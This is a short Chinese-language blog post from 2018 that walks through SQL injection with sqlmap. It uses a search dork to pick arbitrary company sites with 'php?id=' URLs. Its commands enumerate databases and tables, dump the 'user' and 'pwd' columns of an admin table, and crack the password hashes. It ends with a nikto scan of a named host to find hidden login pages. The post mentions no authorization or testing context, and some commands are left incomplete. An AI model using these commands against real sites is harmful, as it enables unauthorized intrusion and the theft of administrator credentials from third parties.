SQLmap

作者: 慕止 | 来源:发表于2018-10-23 10:49 被阅读0次

可以Google或者百度搜索

公司 inurl:php?id=
//初始注入
sqlmap -u 链接地址 --dbs --current-user
基本都是用字典来查找
![有注入漏洞](https://img.haomeiwen.com/i4391209/454c56d74d449911.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
//寻找数据库的表
sqlmap -u --dbms mysql -D 你要查找的表名 --tables
输入10个线程
如果找不到表名可以使用
sqlmap -u --dbms mysql  --tables
//查找指定的表(找的表如:admin)
sqlmap -u 链接 --dbms mysql -T admin --columns
//如找到字段有user,pwd就可以使用:
sqlmap -u 链接 --dbms mysql -T admin -C user,pwd --dump

破解哈希密码


image.png

选择1,使用自带字典慢慢查找。

如果找不到登录入口,可以使用nikto来查找隐藏的目录
nikto -host www.825.st.wsy010.cn

例如

相关文章

网友评论

      本文标题:SQLmap

      本文链接:https://www.haomeiwen.com/subject/pyojtftx.html